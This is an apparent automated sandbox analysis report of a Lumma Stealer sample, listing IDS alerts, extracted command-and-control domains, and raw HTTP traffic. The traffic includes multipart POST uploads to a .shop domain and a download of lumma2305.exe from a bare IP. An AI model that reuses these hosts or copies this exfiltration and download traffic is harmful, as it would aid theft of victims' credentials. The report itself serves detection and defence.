                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49737 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49738 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49739 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49740 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49741 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49742 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49743 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49744 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49745 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49746 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49747 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49748 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49750 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49751 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49752 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49753 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49754 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49755 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49756 -> 188.114.96.3:443
                  Source: TrafficSnort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49757 -> 188.114.96.3:443
                  Source: Malware configuration extractorURLs: roomabolishsnifftwk.shop
                  Source: Malware configuration extractorURLs: civilianurinedtsraov.shop
                  Source: Malware configuration extractorURLs: stalfbaclcalorieeis.shop
                  Source: Malware configuration extractorURLs: employhabragaomlsp.shop
                  Source: Malware configuration extractorURLs: femininiespywageg.shop
                  Source: Malware configuration extractorURLs: averageaattractiionsl.shop
                  Source: Malware configuration extractorURLs: buttockdecarderwiso.shop
                  Source: Malware configuration extractorURLs: museumtespaceorsp.shop
                  Source: Malware configuration extractorURLs: employhabragaomlsp.shop
                  Source: global trafficTCP traffic: 192.168.2.6:49710 -> 5.42.65.116:50500
                  Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                  Source: Joe Sandbox ViewIP Address: 34.117.186.192 34.117.186.192
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: ipinfo.io
                  Source: unknownDNS query: name: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566526Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566526Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572276Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572276Host: employhabragaomlsp.shop
                  Source: global trafficHTTP traffic detected: HEAD /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: unknownTCP traffic detected without corresponding DNS query: 5.42.65.116
                  Source: global trafficHTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
                  Source: global trafficHTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
                  Source: global trafficHTTP traffic detected: GET /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: ipinfo.io
                  Source: global trafficDNS traffic detected: DNS query: db-ip.com
                  Source: global trafficDNS traffic detected: DNS query: employhabragaomlsp.shop
                  Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exe
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exeEWPz
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exeMeleonCH
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exeaTTm
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exej
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exeto.de
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2259208520.0000000006162000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.65.116/lumma2305.exe~
                  Source: Amcache.hve.15.drString found in binary or memory: http://upx.sf.net
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.175
                  Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.00000000014FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.175
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: tMO4FVIc9l.exe, 00000000.00000003.2146231923.0000000006185000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144355796.0000000006156000.00000004.00000020.00020000.00000000.sdmp, tMO4FVIc9l.exe, 00000000.00000003.2144919688.0000000006166000.00000004.00000020.00020000.00000000.sdmp, dP6LfDcELUJXWeb Data.0.dr, RzvNVqGUEpJhWeb Data.0.dr, S4ECHZA8NR3oWeb Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
